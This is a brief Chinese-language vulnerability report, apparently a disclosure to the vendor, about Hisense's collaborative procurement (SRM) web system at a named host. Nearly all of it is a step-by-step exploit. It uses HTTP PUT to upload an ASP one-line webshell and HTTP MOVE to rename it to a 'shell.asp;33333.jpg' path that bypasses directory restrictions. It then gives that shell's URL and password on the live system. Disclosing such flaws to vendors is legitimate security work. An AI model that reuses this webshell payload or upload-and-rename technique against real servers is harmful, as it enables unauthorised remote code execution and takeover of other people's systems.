http://srm.hisense.com:8001/SRMWeb/ 海信协同采购系统
srm.hisense.com:8001/SRMWeb目录 http方法支持put move,上传脚本文件导致系统被getshell
还有N个目录也可以执行,请厂商自己排除一下。
首先,我们访问一个不存在的txt页面,记录下来get请求
接着put这个txt文件,并在put下面加入准备执行的脚本<%execute request("kn")%>
201显示是成功的
接着MOVE 加入Destination:http://srm.hisense.com:8001/SRMWeb/shell.asp;33333.jpg
201响应显示执行成功
http://srm.hisense.com:8001/SRMWeb/shell.asp;33333.jpg 密码kn
虽然系统禁止了某些目录的权限,任何脚本文件都无法上传成功,不过;.中间加了数字也可以绕过。